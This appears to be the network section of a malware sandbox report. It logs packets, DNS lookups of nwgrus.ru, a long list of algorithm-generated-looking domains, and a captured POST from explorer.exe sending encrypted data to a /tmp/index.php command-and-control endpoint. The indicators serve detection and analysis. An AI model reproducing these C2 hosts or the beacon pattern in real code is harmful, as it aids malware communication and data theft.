Oct 12, 2024 20:09:40.892951012 CEST	80	50015	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:40.893089056 CEST	50015	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:40.893574953 CEST	80	50015	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:40.893639088 CEST	50015	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:40.896163940 CEST	80	50015	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:40.896193027 CEST	80	50015	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:40.896220922 CEST	80	50015	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:40.896253109 CEST	50015	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:40.896269083 CEST	50015	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:43.700503111 CEST	50016	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:43.706607103 CEST	80	50016	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:43.706904888 CEST	50016	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:43.706906080 CEST	50016	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:43.706906080 CEST	50016	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:43.712658882 CEST	80	50016	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:43.712709904 CEST	80	50016	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:45.206844091 CEST	80	50016	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:45.207338095 CEST	80	50016	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:45.207551956 CEST	50016	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:45.207551956 CEST	50016	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:45.213047981 CEST	80	50016	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:49.800120115 CEST	50017	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:49.811477900 CEST	80	50017	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:49.811592102 CEST	50017	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:49.811738968 CEST	50017	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:49.811764956 CEST	50017	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:49.817473888 CEST	80	50017	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:49.817487955 CEST	80	50017	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:51.303992987 CEST	80	50017	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:51.304086924 CEST	80	50017	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:51.304176092 CEST	50017	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:51.304306030 CEST	50017	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:51.309189081 CEST	80	50017	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:55.725019932 CEST	50018	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:55.730482101 CEST	80	50018	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:55.730611086 CEST	50018	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:55.730739117 CEST	50018	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:55.730772018 CEST	50018	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:55.735733986 CEST	80	50018	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:55.735764980 CEST	80	50018	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:57.202977896 CEST	80	50018	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:57.203066111 CEST	80	50018	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:57.203145981 CEST	50018	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:57.203242064 CEST	50018	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:57.208129883 CEST	80	50018	119.204.11.2	192.168.2.5
Oct 12, 2024 20:10:05.618999004 CEST	60089	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:05.623936892 CEST	80	60089	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:05.624042988 CEST	60089	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:05.624172926 CEST	60089	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:05.624182940 CEST	60089	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:05.630160093 CEST	80	60089	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:05.631269932 CEST	80	60089	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:07.063302040 CEST	80	60089	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:07.063460112 CEST	80	60089	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:07.063550949 CEST	60089	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:07.063620090 CEST	60089	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:07.069400072 CEST	80	60089	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:10.426723003 CEST	60090	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:10.431813002 CEST	80	60090	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:10.431971073 CEST	60090	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:10.432107925 CEST	60090	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:10.432109118 CEST	60090	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:10.438182116 CEST	80	60090	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:10.438211918 CEST	80	60090	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:11.869925022 CEST	80	60090	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:11.870115042 CEST	80	60090	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:11.870177031 CEST	60090	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:11.870220900 CEST	60090	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:11.875686884 CEST	80	60090	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:16.228486061 CEST	60091	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:16.442487955 CEST	80	60091	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:16.442619085 CEST	60091	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:16.442836046 CEST	60091	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:16.442836046 CEST	60091	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:16.447645903 CEST	80	60091	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:16.447864056 CEST	80	60091	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:17.906589985 CEST	80	60091	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:17.910243034 CEST	80	60091	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:17.910339117 CEST	60091	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:17.917098045 CEST	60091	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:17.922075987 CEST	80	60091	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:22.248954058 CEST	60092	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:22.254139900 CEST	80	60092	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:22.254244089 CEST	60092	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:22.254404068 CEST	60092	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:22.254436016 CEST	60092	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:22.259356022 CEST	80	60092	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:22.259516001 CEST	80	60092	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:23.702090025 CEST	80	60092	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:23.702141047 CEST	80	60092	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:23.702222109 CEST	60092	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:23.702428102 CEST	60092	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:23.707254887 CEST	80	60092	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:28.951699972 CEST	60093	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:28.956794977 CEST	80	60093	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:28.956896067 CEST	60093	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:28.957082033 CEST	60093	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:28.957132101 CEST	60093	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:28.962270021 CEST	80	60093	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:28.962451935 CEST	80	60093	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:30.352883101 CEST	80	60093	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:30.353166103 CEST	80	60093	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:30.353244066 CEST	60093	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:30.353348970 CEST	60093	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:30.358401060 CEST	80	60093	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:34.681212902 CEST	60094	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:34.773701906 CEST	80	60094	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:34.773796082 CEST	60094	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:34.773941040 CEST	60094	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:34.773976088 CEST	60094	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:34.778983116 CEST	80	60094	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:34.779014111 CEST	80	60094	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:36.229604006 CEST	80	60094	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:36.229760885 CEST	80	60094	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:36.229845047 CEST	60094	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:36.231537104 CEST	60094	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:36.236427069 CEST	80	60094	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:40.189896107 CEST	60095	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:40.195266962 CEST	80	60095	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:40.195369005 CEST	60095	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:40.195491076 CEST	60095	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:40.195527077 CEST	60095	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:40.200292110 CEST	80	60095	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:40.200536013 CEST	80	60095	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:41.630479097 CEST	80	60095	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:41.630572081 CEST	80	60095	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:41.630767107 CEST	60095	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:41.630870104 CEST	60095	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:41.637284994 CEST	80	60095	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:44.928771019 CEST	60096	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:44.934091091 CEST	80	60096	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:44.934236050 CEST	60096	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:44.934335947 CEST	60096	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:44.934374094 CEST	60096	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:44.939558029 CEST	80	60096	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:44.939589977 CEST	80	60096	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:46.361423016 CEST	80	60096	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:46.361453056 CEST	80	60096	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:46.361536980 CEST	60096	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:46.361769915 CEST	60096	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:46.366588116 CEST	80	60096	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:50.236258030 CEST	60097	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:50.241606951 CEST	80	60097	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:50.241720915 CEST	60097	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:50.241883039 CEST	60097	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:50.241919041 CEST	60097	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:50.247287035 CEST	80	60097	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:50.247317076 CEST	80	60097	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:51.683959961 CEST	80	60097	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:51.684092999 CEST	80	60097	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:51.684156895 CEST	60097	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:51.684351921 CEST	60097	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:51.689147949 CEST	80	60097	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:55.437047005 CEST	60098	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:55.442363977 CEST	80	60098	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:55.442465067 CEST	60098	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:55.442645073 CEST	60098	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:55.442673922 CEST	60098	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:55.447571993 CEST	80	60098	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:55.447900057 CEST	80	60098	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:56.903294086 CEST	80	60098	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:56.903348923 CEST	80	60098	175.119.10.231	192.168.2.5
Oct 12, 2024 20:10:56.903490067 CEST	60098	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:56.903590918 CEST	60098	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:10:56.908699989 CEST	80	60098	175.119.10.231	192.168.2.5
Oct 12, 2024 20:11:01.748743057 CEST	60099	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:11:02.606597900 CEST	80	60099	175.119.10.231	192.168.2.5
Oct 12, 2024 20:11:02.607084036 CEST	60099	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:11:02.607198000 CEST	60099	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:11:02.607198000 CEST	60099	80	192.168.2.5	175.119.10.231
Oct 12, 2024 20:11:02.612180948 CEST	80	60099	175.119.10.231	192.168.2.5
Oct 12, 2024 20:11:02.612289906 CEST	80	60099	175.119.10.231	192.168.2.5
Oct 12, 2024 20:11:04.022588015 CEST	80	60099	175.119.10.231	192.168.2.5
Oct 12, 2024 20:11:04.022815943 CEST	80	60099	175.119.10.231	192.168.2.5
Oct 12, 2024 20:11:04.022958994 CEST	60099	80	192.168.2.5	175.119.10.231

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2024 20:07:23.962045908 CEST	57496	53	192.168.2.5	1.1.1.1
Oct 12, 2024 20:07:24.957123041 CEST	57496	53	192.168.2.5	1.1.1.1
Oct 12, 2024 20:07:25.972798109 CEST	57496	53	192.168.2.5	1.1.1.1
Oct 12, 2024 20:07:27.988540888 CEST	57496	53	192.168.2.5	1.1.1.1
Oct 12, 2024 20:07:28.073901892 CEST	53	57496	1.1.1.1	192.168.2.5
Oct 12, 2024 20:07:28.073935986 CEST	53	57496	1.1.1.1	192.168.2.5
Oct 12, 2024 20:07:28.073944092 CEST	53	57496	1.1.1.1	192.168.2.5
Oct 12, 2024 20:07:28.073951960 CEST	53	57496	1.1.1.1	192.168.2.5
Oct 12, 2024 20:10:01.575406075 CEST	57718	53	192.168.2.5	1.1.1.1
Oct 12, 2024 20:10:02.566796064 CEST	57718	53	192.168.2.5	1.1.1.1
Oct 12, 2024 20:10:02.574071884 CEST	53	57718	1.1.1.1	192.168.2.5
Oct 12, 2024 20:10:03.638221025 CEST	53	57718	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 12, 2024 20:07:23.962045908 CEST	192.168.2.5	1.1.1.1	0xc35e	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:24.957123041 CEST	192.168.2.5	1.1.1.1	0xc35e	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:25.972798109 CEST	192.168.2.5	1.1.1.1	0xc35e	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:27.988540888 CEST	192.168.2.5	1.1.1.1	0xc35e	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:10:01.575406075 CEST	192.168.2.5	1.1.1.1	0x37fc	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:10:02.566796064 CEST	192.168.2.5	1.1.1.1	0x37fc	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 12, 2024 20:07:28.073901892 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	119.204.11.2	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073901892 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	220.125.3.190	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073901892 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	190.187.52.42	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073901892 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	190.224.203.37	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073901892 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073901892 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	93.118.137.82	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073901892 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073901892 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	189.164.127.217	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073901892 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	187.199.203.72	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073901892 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073935986 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	119.204.11.2	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073935986 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	220.125.3.190	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073935986 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	190.187.52.42	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073935986 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	190.224.203.37	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073935986 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073935986 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	93.118.137.82	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073935986 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073935986 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	189.164.127.217	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073935986 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	187.199.203.72	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073935986 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073944092 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	119.204.11.2	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073944092 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	220.125.3.190	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073944092 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	190.187.52.42	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073944092 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	190.224.203.37	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073944092 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073944092 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	93.118.137.82	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073944092 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073944092 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	189.164.127.217	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073944092 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	187.199.203.72	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073944092 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073951960 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	119.204.11.2	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073951960 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	220.125.3.190	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073951960 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	190.187.52.42	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073951960 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	190.224.203.37	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073951960 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073951960 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	93.118.137.82	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073951960 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073951960 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	189.164.127.217	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073951960 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	187.199.203.72	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:07:28.073951960 CEST	1.1.1.1	192.168.2.5	0xc35e	No error (0)	nwgrus.ru	189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:10:03.638221025 CEST	1.1.1.1	192.168.2.5	0x37fc	No error (0)	nwgrus.ru	177.129.90.106	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:10:03.638221025 CEST	1.1.1.1	192.168.2.5	0x37fc	No error (0)	nwgrus.ru	200.45.93.45	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:10:03.638221025 CEST	1.1.1.1	192.168.2.5	0x37fc	No error (0)	nwgrus.ru	201.233.78.169	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:10:03.638221025 CEST	1.1.1.1	192.168.2.5	0x37fc	No error (0)	nwgrus.ru	190.146.112.188	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:10:03.638221025 CEST	1.1.1.1	192.168.2.5	0x37fc	No error (0)	nwgrus.ru	190.224.203.37	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:10:03.638221025 CEST	1.1.1.1	192.168.2.5	0x37fc	No error (0)	nwgrus.ru	185.12.79.25	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:10:03.638221025 CEST	1.1.1.1	192.168.2.5	0x37fc	No error (0)	nwgrus.ru	175.119.10.231	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:10:03.638221025 CEST	1.1.1.1	192.168.2.5	0x37fc	No error (0)	nwgrus.ru	186.233.231.45	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:10:03.638221025 CEST	1.1.1.1	192.168.2.5	0x37fc	No error (0)	nwgrus.ru	180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 12, 2024 20:10:03.638221025 CEST	1.1.1.1	192.168.2.5	0x37fc	No error (0)	nwgrus.ru	211.171.233.129	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

23.145.40.164

yilmrbbiqbh.com

nwgrus.ru

saaiglxgesx.net

wmicpxlifessw.org

vbthucuxeraia.com

fhouqknummbbf.com

onlnloemqmkdhio.com

xrccmhuqkqkddsnr.net

sgoujgwybxsges.org

jousimacigldf.com

sswxpvuufbvykyb.org

cdinohvnolrheurg.com

lifadhlvdwb.net

ssfieliemcmj.org

oigeugvvgtqexcr.com

rscdgmrjlxccyebn.org

jdrsrpxnderfeln.com

letknxuqhdcyc.com

wkvsglvqmchooeii.com

liwpdohaxncmk.org

brtyhhcwxjs.net

ndcrdrvnqscc.com

bsujsjkqxtjctly.net

tkcyaumypyw.com

vllrmfxybsdiplqu.com

tamqyjusikafosy.net

rtsymdwebcyefo.net

cmpymujrwfied.org

mlfyuywbsduqi.net

xasjtfaqoixq.org

fedsyouolon.com

lbemhhdwkax.org

tihslqvhibr.org

vltcfypculmuiq.net

emfnibhwebsi.net

sawtavgcrgnnv.com

ttpnojrymdictnko.com

sdiwjkiticrn.com

uedxkfpodrvnuu.net

jmiqpftbbfl.net

eguapsteeivf.com

jmyhnxbsgfyxxpwc.com

olbmmmarqkp.com

hhxlvwfcbrqijpck.org

stpaxqpyogea.org

hvlkumwrcebxfc.org

wuwimcitsicpgplo.net

iqvctgowbce.com

ranxxolmdknfcjg.org

mqxuhbjviiy.com

gbnguovvbpjawi.net

bkopsfqneci.org

ugrocofopkun.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49792	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:28.084242105 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yilmrbbiqbh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 353 Host: nwgrus.ru
Oct 12, 2024 20:07:28.084254980 CEST	353	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4d 3f a6 86 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA .[k,vuM?X'x;,]Xuf]i+T+c;&TPm;mcd ti[?E)lSv#Ft=}8UxlfrHUX>
Oct 12, 2024 20:07:29.848795891 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:29 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 87 e8 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49799	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
